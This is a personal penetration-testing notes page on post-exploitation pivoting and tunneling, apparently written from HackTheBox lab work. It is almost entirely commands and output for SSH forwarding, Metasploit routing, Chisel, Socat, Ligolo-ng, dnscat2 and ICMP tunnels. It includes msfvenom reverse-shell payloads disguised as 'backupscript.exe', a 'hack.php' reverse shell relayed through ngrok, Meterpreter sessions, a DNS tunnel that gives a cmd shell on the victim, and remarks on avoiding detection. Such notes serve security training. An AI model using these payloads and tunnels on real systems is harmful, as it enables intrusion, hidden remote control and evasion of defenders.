> For the complete documentation index, see [llms.txt](https://0xss0rz.gitbook.io/0xss0rz/llms.txt). Markdown versions of documentation pages are available by appending `.md` to page URLs; this page is available as [Markdown](https://0xss0rz.gitbook.io/0xss0rz/pentest/post-exploitation/pivot-tunneling-and-port-forwarding.md).

# Pivot, Tunneling and Port Forwarding

## SSH

### Local port forwarding

Mysql port 3306 on victim localhost: `netstat -tulpn`

```shell-session
ssh -L 1234:localhost:3306 ubuntu@10.129.202.64
```

The `-L` command tells the SSH client to request the SSH server to forward all the data we send via the port `1234` to `localhost:3306` on the Ubuntu server.

```shell-session
$ nmap -v -sV -p1234 localhost

PORT     STATE SERVICE VERSION
1234/tcp open  mysql   MySQL 8.0.28-0ubuntu0.20.04.3
```

#### Web server listening on localhost

```
user@box:~$ netstat -tulpn
(Not all processes could be identified, non-owned process info
 will not be shown, you would have to be root to see it all.)
Active Internet connections (only servers)
Proto Recv-Q Send-Q Local Address           Foreign Address         State       PID/Program name    
tcp        0      0 127.0.0.1:3306          0.0.0.0:*               LISTEN      -                   
tcp        0      0 127.0.0.1:8080          0.0.0.0:*               LISTEN      -                   
tcp        0      0 0.0.0.0:22              0.0.0.0:*               LISTEN      -                   
tcp        0      0 127.0.0.1:33060         0.0.0.0:*               LISTEN      -                   
tcp        0      0 0.0.0.0:80              0.0.0.0:*               LISTEN      -                   
tcp        0      0 127.0.0.1:33209         0.0.0.0:*               LISTEN      -                   
tcp        0      0 127.0.0.1:37285         0.0.0.0:*               LISTEN      -                   
tcp        0      0 127.0.0.53:53           0.0.0.0:*               LISTEN      -                   
tcp        0      0 127.0.0.1:3000          0.0.0.0:*               LISTEN      -                   
tcp        0      0 127.0.0.1:43765         0.0.0.0:*               LISTEN      -                   
tcp6       0      0 :::22                   :::*                    LISTEN      -                   
tcp6       0      0 :::21                   :::*                    LISTEN      -                   
udp        0      0 127.0.0.53:53           0.0.0.0:*                           -                   
udp        0      0 0.0.0.0:68              0.0.0.0:*                           -                   
```

```
127.0.0.1:8080
```

```
ssh -L 8888:localhost:8080 user@box.htb
```

<figure><img src="/files/ep2Wzct3Wx6spqFKVRAQ" alt=""><figcaption></figcaption></figure>

### Forwarding multiple ports

```shell-session
ssh -L 1234:localhost:3306 -L 8080:localhost:80 ubuntu@10.129.202.64
```

### Dynamic Port Forwarding with SSH

```shell-session
ssh -D 9050 ubuntu@10.129.202.64
```

```shell-session
$ tail -4 /etc/proxychains.conf

# meanwile
# defaults set to "tor"
socks4 	127.0.0.1 9050
```

```shell-session
proxychains nmap -v -sn 172.16.5.1-200
```

#### - sT

```shell-session
proxychains nmap -v -Pn -sT 172.16.5.19
```

### Remote / reverse port forward

```shell-session
ssh -R <InternalIPofPivotHost>:8080:0.0.0.0:8000 ubuntu@<ourIP> -vN
```

1. Attacker host

**Create user**

```
sudo adduser tunnel
sudo usermod -aG sudo tunnel
```

**Configue SSH Server**

```
vim /etc/ssh/sshd_config
```

Add

```
PasswordAuthentication yes
AllowUsers tunnel
Port 2222
```

**Restart SSH Server**

```
sudo systemctl restart sshd
```

or inside a Docker&#x20;

```
[Jan 18, 2025 - 03:43:07 (EST)] exegol-default /workspace # sudo mkdir -p /run/sshd
[Jan 18, 2025 - 03:43:44 (EST)] exegol-default /workspace # sudo chmod 0755 /run/sshd
[Jan 18, 2025 - 03:43:52 (EST)] exegol-default /workspace # /usr/sbin/sshd           
[Jan 18, 2025 - 03:43:58 (EST)] exegol-default /workspace # service ssh status       
sshd is running.
```

2 - On victim - Connect to our host

{% hint style="info" %}
*By default, proxychains is on port 1080*
{% endhint %}

```
ssh tunnel@10.8.1.254 -R 1080 -p 2222 -N
```

<figure><img src="/files/4roVqyrCq3NVxQ3rWpBh" alt=""><figcaption></figcaption></figure>

Attacker host:

```
# proxychains nmap -p 389,445 -Pn 172.16.41.14 -sT
```

## WinSSH

{% embed url="<https://github.com/xct/winssh>" %}

{% embed url="<https://vuln.dev/tool-review-winssh/>" %}

## Metasploit

### &#x20;MSF's SOCKS Proxy

```shell-session
msf6 > use auxiliary/server/socks_proxy

msf6 auxiliary(server/socks_proxy) > set SRVPORT 9050
SRVPORT => 9050
msf6 auxiliary(server/socks_proxy) > set SRVHOST 0.0.0.0
SRVHOST => 0.0.0.0
msf6 auxiliary(server/socks_proxy) > set version 4a
version => 4a
msf6 auxiliary(server/socks_proxy) > run
[*] Auxiliary module running as background job 0.

[*] Starting the SOCKS proxy server
msf6 auxiliary(server/socks_proxy) > options

Module options (auxiliary/server/socks_proxy):

   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   SRVHOST  0.0.0.0          yes       The address to listen on
   SRVPORT  9050             yes       The port to listen on
   VERSION  4a               yes       The SOCKS version to use (Accepted: 4a,
                                        5)


Auxiliary action:

   Name   Description
   ----   -----------
   Proxy  Run a SOCKS proxy server
```

proxychains:

```shell-session
socks4 	127.0.0.1 9050
```

### Autoroute

```shell-session
msf6 > use post/multi/manage/autoroute

msf6 post(multi/manage/autoroute) > set SESSION 1
SESSION => 1
msf6 post(multi/manage/autoroute) > set SUBNET 172.16.5.0
SUBNET => 172.16.5.0
msf6 post(multi/manage/autoroute) > run

[!] SESSION may not be compatible with this module:
[!]  * incompatible session platform: linux
[*] Running module against 10.129.202.64
[*] Searching for subnets to autoroute.
[+] Route added to subnet 10.129.0.0/255.255.0.0 from host's routing table.
[+] Route added to subnet 172.16.5.0/255.255.254.0 from host's routing table.
[*] Post module execution completed
```

or

```shell-session
meterpreter > run autoroute -s 172.16.5.0/23

[!] Meterpreter scripts are deprecated. Try post/multi/manage/autoroute.
[!] Example: run post/multi/manage/autoroute OPTION=value [...]
[*] Adding a route to 172.16.5.0/255.255.254.0...
[+] Added route to 172.16.5.0/255.255.254.0 via 10.129.202.64
[*] Use the -p option to list all active routes
```

#### Listing autoroute

```shell-session
meterpreter > run autoroute -p

[!] Meterpreter scripts are deprecated. Try post/multi/manage/autoroute.
[!] Example: run post/multi/manage/autoroute OPTION=value [...]

Active Routing Table
====================

   Subnet             Netmask            Gateway
   ------             -------            -------
   10.129.0.0         255.255.0.0        Session 1
   172.16.4.0         255.255.254.0      Session 1
   172.16.5.0         255.255.254.0      Session 1
```

test

```shell-session
 proxychains nmap 172.16.5.19 -p3389 -sT -v -Pn
```

### MSF local port forward

```shell-session
meterpreter > portfwd add -l 3300 -p 3389 -r 172.16.5.19

[*] Local TCP relay created: :3300 <-> 172.16.5.19:3389
```

The above command requests the Meterpreter session to start a listener on our attack host's local port (`-l`) `3300` and forward all the packets to the remote (`-r`) Windows server `172.16.5.19` on `3389` port (`-p`) via our Meterpreter session.

```shell-session
xfreerdp /v:localhost:3300 /u:victor /p:pass@123
```

### Meterpreter Reverse Port Forwarding

```shell-session
meterpreter > portfwd add -R -l 8081 -p 1234 -L 10.10.14.18

[*] Local TCP relay created: 10.10.14.18:8081 <-> :1234
```

```shell-session
meterpreter > bg

[*] Backgrounding session 1...
msf6 exploit(multi/handler) > set payload windows/x64/meterpreter/reverse_tcp
payload => windows/x64/meterpreter/reverse_tcp
msf6 exploit(multi/handler) > set LPORT 8081 
LPORT => 8081
msf6 exploit(multi/handler) > set LHOST 0.0.0.0 
LHOST => 0.0.0.0
msf6 exploit(multi/handler) > run

[*] Started reverse TCP handler on 0.0.0.0:8081 
```

We can now create a reverse shell payload that will send a connection back to our Ubuntu server on `172.16.5.129`:`1234` when executed on our Windows host. Once our Ubuntu server receives this connection, it will forward that to `attack host's ip`:`8081` that we configured.

```shell-session
$ msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=172.16.5.129 -f exe -o backupscript.exe LPORT=1234

[-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload
[-] No arch selected, selecting arch: x64 from the payload
No encoder specified, outputting raw payload
Payload size: 510 bytes
Final size of exe file: 7168 bytes
Saved as: backupscript.exe
```

```shell-session
[*] Started reverse TCP handler on 0.0.0.0:8081 
[*] Sending stage (200262 bytes) to 10.10.14.18
[*] Meterpreter session 2 opened (10.10.14.18:8081 -> 10.10.14.18:40173 ) at 2022-03-04 15:26:14 -0500

meterpreter > shell
Process 2336 created.
Channel 1 created.
Microsoft Windows [Version 10.0.17763.1637]
(c) 2018 Microsoft Corporation. All rights reserved.

C:\>
```

### Resources

{% embed url="<https://www.offsec.com/metasploit-unleashed/pivoting/>" %}

{% embed url="<https://docs.metasploit.com/docs/using-metasploit/intermediate/pivoting-in-metasploit.html>" %}

## Proxychains

`proxychains -q <cmd>` : quiet mode

Nmap over proxychains: `proxychains -q nmap -sT IP PORT`

## tun2socks

{% embed url="<https://github.com/xjasonlyu/tun2socks>" %}

## Chisel

{% embed url="<https://github.com/jpillora/chisel>" %}

{% embed url="<https://www.bramleysecuritytesting.co.uk/blog/using-chisel-for-pivoting>" %}

### Socks4

```
user@box:~$ netstat -tulpn
(Not all processes could be identified, non-owned process info
 will not be shown, you would have to be root to see it all.)
Active Internet connections (only servers)
Proto Recv-Q Send-Q Local Address           Foreign Address         State       PID/Program name    
tcp        0      0 127.0.0.1:3306          0.0.0.0:*               LISTEN      -                   
tcp        0      0 127.0.0.1:8080          0.0.0.0:*               LISTEN      -  
```

```
# ./chisel server -v -p 1234 --reverse  
```

```
user@box:/tmp$ ./chisel client 10.10.14.136:1234 R:8080:127.0.0.1:8080
```

```
# proxychains curl http://127.0.0.1:8080
```

proxychains not working - try without proxychains

```
# curl http://127.0.0.1:8080

<!DOCTYPE html>
<html lang="en" data-bs-theme="light">
<head>
<--SNIP-->
```

### Socks5

```shell-session
0xss0rz@htb[/htb]$ cat /etc/proxychains.conf

<SNIP>

[ProxyList]
socks5 127.0.0.1 1080
```

```shell-session
0xss0rz@htb[/htb]$ wget https://github.com/jpillora/chisel/releases/download/v1.7.7/chisel_1.7.7_linux_amd64.gz
0xss0rz@htb[/htb]$ gzip -d chisel_1.7.7_linux_amd64.gz
0xss0rz@htb[/htb]$ mv chisel_* chisel && chmod +x ./chisel
0xss0rz@htb[/htb]$ sudo ./chisel server --reverse 

2022/10/10 07:26:15 server: Reverse tunneling enabled
2022/10/10 07:26:15 server: Fingerprint 58EulHjQXAOsBRpxk232323sdLHd0r3r2nrdVYoYeVM=
2022/10/10 07:26:15 server: Listening on http://0.0.0.0:8080
```

```cmd-session
C:\htb> c:\tools\chisel.exe client 10.10.14.33:8080 R:socks

2022/10/10 06:34:19 client: Connecting to ws://10.10.14.33:8080
2022/10/10 06:34:20 client: Connected (Latency 125.6177ms)
```

or choose an other port

```shell-session
./chisel server -v -p 1234 --socks5
```

## Socat

### Socat Reverse shell

On pivot host

```shell-session
ubuntu@Webserver:~$ socat TCP4-LISTEN:8080,fork TCP4:10.10.14.18:80
```

Socat will listen on localhost on port `8080` and forward all the traffic to port `80` on our attack host (10.10.14.18).

```shell-session
$ msfvenom -p windows/x64/meterpreter/reverse_https LHOST=172.16.5.129 -f exe -o backupscript.exe LPORT=8080
```

```shell-session
msf6 > use exploit/multi/handler

[*] Using configured payload generic/shell_reverse_tcp
msf6 exploit(multi/handler) > set payload windows/x64/meterpreter/reverse_https
payload => windows/x64/meterpreter/reverse_https
msf6 exploit(multi/handler) > set lhost 0.0.0.0
lhost => 0.0.0.0
msf6 exploit(multi/handler) > set lport 80
lport => 80
msf6 exploit(multi/handler) > run

[*] Started HTTPS reverse handler on https://0.0.0.0:80
```

```shell-session
[!] https://0.0.0.0:80 handling request from 10.129.202.64; (UUID: 8hwcvdrp) Without a database connected that payload UUID tracking will not work!
[*] https://0.0.0.0:80 handling request from 10.129.202.64; (UUID: 8hwcvdrp) Staging x64 payload (201308 bytes) ...
[!] https://0.0.0.0:80 handling request from 10.129.202.64; (UUID: 8hwcvdrp) Without a database connected that payload UUID tracking will not work!
[*] Meterpreter session 1 opened (10.10.14.18:80 -> 127.0.0.1 ) at 2022-03-07 11:08:10 -0500

meterpreter > getuid
Server username: INLANEFREIGHT\victor
```

### Socat Bind shell

```shell-session
$ msfvenom -p windows/x64/meterpreter/bind_tcp -f exe -o backupscript.exe LPORT=8443

[-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload
[-] No arch selected, selecting arch: x64 from the payload
No encoder specified, outputting raw payload
Payload size: 499 bytes
Final size of exe file: 7168 bytes
Saved as: backupjob.exe
```

`socat bind shell` listener, which listens on port `8080` and forwards packets to Windows server `8443`.

On pivot machine:

```shell-session
ubuntu@Webserver:~$ socat TCP4-LISTEN:8080,fork TCP4:172.16.5.19:8443
```

```shell-session
msf6 > use exploit/multi/handler

[*] Using configured payload generic/shell_reverse_tcp
msf6 exploit(multi/handler) > set payload windows/x64/meterpreter/bind_tcp
payload => windows/x64/meterpreter/bind_tcp
msf6 exploit(multi/handler) > set RHOST 10.129.202.64
RHOST => 10.129.202.64
msf6 exploit(multi/handler) > set LPORT 8080
LPORT => 8080
msf6 exploit(multi/handler) > run

[*] Started bind TCP handler against 10.129.202.64:8080
```

```shell-session
[*] Sending stage (200262 bytes) to 10.129.202.64
[*] Meterpreter session 1 opened (10.10.14.18:46253 -> 10.129.202.64:8080 ) at 2022-03-07 12:44:44 -0500

meterpreter > getuid
Server username: INLANEFREIGHT\victor
```

## Plink

If the host is older and PuTTY is present (or we can find a copy on a file share), Plink can be our path to victory. We can use it to create our pivot and potentially avoid detection a little longer.

{% embed url="<https://www.chiark.greenend.org.uk/~sgtatham/putty/latest.html>" %}

```cmd-session
plink -ssh -D 9050 ubuntu@10.129.15.50
```

Proxifier can be used to start a SOCKS tunnel via the SSH session we created.

Portable version :&#x20;

{% embed url="<https://www.proxifier.com/download/ProxifierPE.zip>" %}

<figure><img src="/files/VxUMRCEB6wYJkd1dmFXt" alt=""><figcaption></figcaption></figure>

## SSHuttle

removes the need to configure proxychains. However, this tool only works for pivoting over SSH and does not provide other options for pivoting

```shell-session
sudo apt-get install sshuttle
```

```shell-session
sudo sshuttle -r ubuntu@10.129.202.64 172.16.5.0/23 -v 
```

## Rpivot

```shell-session
sudo git clone https://github.com/klsecservices/rpivot.git
```

```shell-session
sudo apt-get install python2.7
```

```shell-session
python2.7 server.py --proxy-port 9050 --server-port 9999 --server-ip 0.0.0.0
```

```shell-session
scp -r rpivot ubuntu@<IpaddressOfTarget>:/home/ubuntu/
```

run client from pivot machine:

```shell-session
ubuntu@WEB01:~/rpivot$ python2.7 client.py --server-ip 10.10.14.18 --server-port 9999
```

HTTP proxy and NTLM auth

```shell-session
python client.py --server-ip <IPaddressofTargetWebServer> --server-port 8080 --ntlm-proxy-ip <IPaddressofProxy> --ntlm-proxy-port 8081 --domain <nameofWindowsDomain> --username <username> --password <password>
```

configure proxychains to pivot over our local server on 127.0.0.1:9050

```shell-session
proxychains firefox-esr 172.16.5.135:80
```

## Netsh

```cmd-session
C:\Windows\system32> netsh.exe interface portproxy add v4tov4 listenport=8080 listenaddress=10.129.15.150 connectport=3389 connectaddress=172.16.5.25
```

```cmd-session
C:\Windows\system32> netsh.exe interface portproxy show v4tov4

Listen on ipv4:             Connect to ipv4:

Address         Port        Address         Port
--------------- ----------  --------------- ----------
10.129.42.198   8080        172.16.5.25     3389
```

<figure><img src="/files/LYgAP4MOt7qqbw7wSEUp" alt=""><figcaption></figcaption></figure>

## DNScat2

DNS Tunneling

```shell-session
$ git clone https://github.com/iagox86/dnscat2.git
cd dnscat2/server/
sudo gem install bundler
sudo bundle install
```

```shell-session
sudo ruby dnscat2.rb --dns host=10.10.14.18,port=53,domain=inlanefreight.local --no-cache
```

Doesn't work on Exegol => Ubuntu

```
sudo apt  install ruby-dev
sudo apt install gem
sudo apt  install ruby-rubygems
export PATH="$PATH:$HOME/.rvm/bin"

```

Will provide us the secret key

<figure><img src="/files/ylIhSqtp9BLZstZ7KtKy" alt=""><figcaption></figcaption></figure>

```shell-session
git clone https://github.com/lukebaggett/dnscat2-powershell.git
```

Import dnscat to windows victim

```
Set-ExecutionPolicy Unrestricted
```

```powershell-session
PS C:\htb> Import-Module .\dnscat2.ps1
```

```powershell-session
PS C:\htb> Start-Dnscat2 -DNSserver 10.10.14.18 -Domain inlanefreight.local -PreSharedSecret 0ec04a91cd1e963f8c03ca499d589d21 -Exec cmd 
```

<figure><img src="/files/nt354QroLT7gmDl2AE5y" alt=""><figcaption></figcaption></figure>

```shell-session
New window created: 1
Session 1 Security: ENCRYPTED AND VERIFIED!
(the security depends on the strength of your pre-shared secret!)

dnscat2>
```

```shell-session
nscat2> ?

Here is a list of commands (use -h on any of them for additional help):
* echo
* help
* kill
* quit
* set
* start
* stop
* tunnels
* unset
* window
* windows
```

```shell-session
dnscat2> window -i 1
New window created: 1
history_size (session) => 1000
Session 1 Security: ENCRYPTED AND VERIFIED!
(the security depends on the strength of your pre-shared secret!)
This is a console session!

That means that anything you type will be sent as-is to the
client, and anything they type will be displayed as-is on the
screen! If the client is executing a command and you don't
see a prompt, try typing 'pwd' or something!

To go back, type ctrl-z.

Microsoft Windows [Version 10.0.18363.1801]
(c) 2019 Microsoft Corporation. All rights reserved.

C:\Windows\system32>
exec (OFFICEMANAGER) 1>
```

## ICMP Tunneling

```shell-session
git clone https://github.com/utoni/ptunnel-ng.git
```

```shell-session
sudo ./autogen.sh
```

```shell-session
scp -r ptunnel-ng ubuntu@10.129.202.64:~/
```

```shell-session
ubuntu@WEB01:~/ptunnel-ng/src$ sudo ./ptunnel-ng -r10.129.202.64 -R22
```

-r: attacker host

```shell-session
sudo ./ptunnel-ng -p10.129.202.64 -l2222 -r10.129.202.64 -R22
```

```shell-session
ssh -p2222 -lubuntu 127.0.0.1
```

Port forward:

```shell-session
ssh -D 9050 -p2222 -lubuntu 127.0.0.1
```

```shell-session
$ proxychains nmap -sV -sT 172.16.5.19 -p3389

ProxyChains-3.1 (http://proxychains.sf.net)
Starting Nmap 7.92 ( https://nmap.org ) at 2022-05-11 11:10 EDT
|S-chain|-<>-127.0.0.1:9050-<><>-172.16.5.19:80-<><>-OK
|S-chain|-<>-127.0.0.1:9050-<><>-172.16.5.19:3389-<><>-OK
|S-chain|-<>-127.0.0.1:9050-<><>-172.16.5.19:3389-<><>-OK
Nmap scan report for 172.16.5.19
Host is up (0.12s latency).

PORT     STATE SERVICE       VERSION
3389/tcp open  ms-wbt-server Microsoft Terminal Services
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 8.78 seconds
```

## SocksOverRDP

{% embed url="<https://github.com/nccgroup/SocksOverRDP/releases>" %}

{% embed url="<https://www.proxifier.com/download/#win-tab>" %}

Copy the `SocksOverRDPx64.zip` on the target

Load dll

```cmd-session
C:\Users\htb-student\Desktop\SocksOverRDP-x64> regsvr32.exe SocksOverRDP-Plugin.dll
```

Connect to 172.16.5.19 over RDP using `mstsc.exe`, and we should receive a prompt that the SocksOverRDP plugin is enabled, and it will listen on 127.0.0.1:1080

<figure><img src="/files/e8Hh9ErhvjbXTHHDWE6N" alt=""><figcaption></figcaption></figure>

We will need to transfer SocksOverRDPx64.zip or just the SocksOverRDP-Server.exe to 172.16.5.19. We can then start SocksOverRDP-Server.exe with Admin privileges.

<figure><img src="/files/h1iNPonZh4PNVZz5EpKn" alt=""><figcaption></figcaption></figure>

After starting our listener, we can transfer Proxifier portable to the Windows 10 target (on the 10.129.x.x network), and configure it to forward all our packets to 127.0.0.1:1080. Proxifier will route traffic through the given host and port

<figure><img src="/files/v4tIt70A5WHwgqE0X0pQ" alt=""><figcaption></figcaption></figure>

Profile > Proxyserver Add 127.0.0.1 port 1080 Socks version5

With Proxifier configured and running, we can start mstsc.exe, and it will use Proxifier to pivot all our traffic via 127.0.0.1:1080, which will tunnel it over RDP to 172.16.5.19, which will then route it to 172.16.6.155 using SocksOverRDP-server.exe.

<figure><img src="/files/dCS06g7ZTvA1eI9QS56U" alt=""><figcaption></figcaption></figure>

***

## Ligolo-ng - The best tool

{% embed url="<https://github.com/nicocha30/ligolo-ng>" %}

#### References

{% embed url="<https://software-sinner.medium.com/how-to-tunnel-and-pivot-networks-using-ligolo-ng-cf828e59e740>" %}

Moving pivot from different hosts

{% embed url="<https://dalemazza.github.io/blog/Ligolo-ng/>" %}

{% embed url="<https://4pfsec.com/ligolo>" %}

```
[Mar 21, 2024 - 02:16:03 (EDT)] exegol-zephyr ligolo # sudo ip tuntap add user root mode tun ligolo

[Mar 21, 2024 - 02:16:15 (EDT)] exegol-zephyr ligolo # sudo ip link set ligolo up
[Mar 21, 2024 - 02:16:30 (EDT)] exegol-zephyr ligolo # scp lin-agent riley@10.10.110.35:/tmp/0xss0rz/lin-agent
riley@10.10.110.35's password: 
lin-agent                                                100% 4572KB   4.9MB/s   00:00    
[Mar 21, 2024 - 02:20:28 (EDT)] exegol-zephyr ligolo #
```

```
./lin-proxy -selfcert -laddr 0.0.0.0:443
```

```
riley@mail:/tmp/0xss0rz$ chmod +x lin-agent 
riley@mail:/tmp/0xss0rz$ ./lin-agent -connect 10.10.14.4:443 -ignore-cert
```

```
ligolo-ng » INFO[0026] Agent joined.                                 name=riley@mail remote="10.10.110.35:46489"
ligolo-ng » session
? Specify a session : 1 - #1 - riley@mail - 10.10.110.35:46489
[Agent : riley@mail] » start
[Agent : riley@mail] » INFO[0315] Starting tunnel to riley@mail
```

```
[Mar 21, 2024 - 02:25:58 (EDT)] exegol-zephyr /workspace # sudo ip route add 192.168.110.0/24 dev ligolo
```

### Double Pivot (and more)

***1st Pivot***

```
sudo ip tuntap add user root mode tun ligolo
```

```
sudo ip link set ligolo up
```

```
./lin-proxy -selfcert -laddr 0.0.0.0:11601
```

```
./lin-agent -connect 10.10.14.2:11601 -ignore-cert
```

```
sudo ip route add 172.16.1.0/24 dev ligolo
```

<figure><img src="/files/YpHZETeaslHkSY70PGEc" alt=""><figcaption></figcaption></figure>

***2nd Pivot***

Create a new interface

```
sudo ip tuntap add user root mode tun ligolo2
```

```
sudo ip link set ligolo2 up
```

```
./lin-agent -connect 10.10.14.2:11601 -ignore-cert
```

```
start --tun ligolo2
```

```
sudo ip route add 172.16.2.0/24 dev ligolo2
```

<figure><img src="/files/wUqqktsRyVDS3xjxrhDN" alt=""><figcaption></figcaption></figure>

3rd Pivot - the same thing (create new interface, tunnel via the new interface), if the subnet is the same, don't forget to delete old routes

```
sudo ip route del 172.16.2.0/24 dev ligolo2
```

### Reverse shell - File Transfer

{% embed url="<https://arth0s.medium.com/ligolo-ng-pivoting-reverse-shells-and-file-transfers-6bfb54593fa5>" %}

```
## Shell on pivot adress (172.16.8.120)
msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=172.16.8.120 LPORT=1234 -f aspx > rs.aspx 
```

```
## On ligolo, create listener to forward port
listener_add --addr 0.0.0.0:1234 --to 0.0.0.0:4444
```

```
##On host
msf6 exploit(multi/handler) > set lhost 0.0.0.0
lhost => 0.0.0.0
msf6 exploit(multi/handler) > set lport 4444
lport => 4444
msf6 exploit(multi/handler) > set payload windows/x64/meterpreter/reverse_tcp
payload => windows/x64/meterpreter/reverse_tcp
```

## Tunnel to localhost

### Bore

{% embed url="<https://github.com/ekzhang/bore>" %}

### Ngrock

{% embed url="<https://download.ngrok.com/downloads/windows?tab=download>" %}

```
#1
./ngrok tcp 4444

#2
msfvenom -p php/meterpreter/reverse_tcp LHOST=0.tcp.ngrok.io LPORT=13757 R > hack.php
```
